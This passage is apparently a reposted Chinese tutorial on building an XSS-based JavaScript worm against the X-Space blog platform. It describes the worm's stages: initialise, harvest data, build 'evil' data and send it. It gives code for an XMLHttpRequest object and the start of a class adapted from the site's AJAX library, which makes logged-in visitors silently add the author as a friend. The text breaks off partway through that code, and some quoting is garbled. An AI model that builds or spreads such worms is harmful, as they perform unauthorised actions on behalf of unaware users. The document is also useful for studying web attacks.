余弦XSSWORM文章.docVIP

web2.0 worm技术细节 本来准备写worm的，但是碰壁了，由于X-Space并非大量使用AJAX技术，所以这个worm会很难诞生（自身复制性等受到了限制），不过刚刚仔细思考了一下，发现即使这个功能模块本身不是基于AJAX，你的worm也可以使用AJAX技术或者同步的XMLHttpRequest()/XMLHTTP技术来实现数据的后台传输。今天是除夕，没办法花过多的时间继续渗透，下面我将总结web2.0 worm的一些技术细节，有不足之处，我会后续补充。 这里说的web2.0 worm是指js脚本编写的蠕虫，现在流行的也就是这个，我的这篇文章《ActionScript的XSS黑客文化》正在严重期待as脚本的黑客文化兴起啊^^ web2.0 worm会无声无息地获取与发送数据，一般情况下可以分为以下过程： 1）、蠕虫初始化 2）、数据的获取与筛选 3）、构造evil数据 4）、发送数据 下面我就以这个过程为顺序来说说对应的js代码应该如何写。 一、蠕虫初始化 技术就是双刃剑，现在的js worm一般都会使用XMLHttpRequest对象，因为无论是异步的数据传输（即AJAX，XMLHttpRequest的open方法的第三个参数为true，表示开启异步）还是同步的数据传输（XMLHttpRequest对象的open方法的第三个参数为false时，默认为true）都是基于这个XMLHttpRequest对象的！为了兼容主流的IE与FF浏览器，我们可以这样来创建XMLHttpRequest对象： var xmlhttp = false; if(window.XMLHttpRequest){ xmlhttp = new XMLHttpRequest(); //FF等非IE内核浏览器，就直接这样创建XMLHttpRequest对象 } else if(window.ActiveXObject){ xmlhttp = new ActiveXObject(Msxml2.XMLHTTP); //IE内核的浏览器，使用ActiveXObject组件来创建不同版本的XMLHttpRequest对象 if(!xmlhttp){xmlhttp = new ActiveXObject(Microsoft.XMLHTTP);} } 我们也可以将上面的代码写成一个js类，这样的好处是可以扩展，并且当代码量大时就很方便重复利用，咱这个小蠕虫就没必要了。其实我们还可以就地取材，因为这些web2.0的网站如果使用了AJAX技术，那么他们就肯定有自己的AJAX代码了，在全局环境中，可以很方便引用的。比如我就借用了X-Space的ajax.js库文件，轻易地实现这样的功能：每个访问我博客页面的访客（如果此访客本身处于登录状态的话）将不知不觉加我为他的好友。代码如下： //cosAjax类改自X-Space的Ajax类，删除了对蠕虫不利的代码 function cosAjax(recvType) { var aj = new Object(); aj.targetUrl = ; aj.sendString = ; aj.recvType = recvType ? recvType : HTML; aj.resultHandle = null; aj.createXMLHttpRequest = function() { var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType(text/xml); } } else if(window.ActiveXObject) { var versions = [Microsoft.XMLHTTP, MSXML.XMLHTTP, Microsoft.XMLHTTP, Msxml2.XMLHTTP.7.0, Msxml2.XMLHTTP.6.0, Msxml2.XMLHTTP.5.0, Msxml2.XMLHTTP.4.0, MSXML2.XMLHTTP.3.0, MSXML2.XMLHTTP]; for(var i=0; iversions.length; i++) { try { request = new ActiveXObject(versions[i]); if(request) { return request; } } catch(e) { }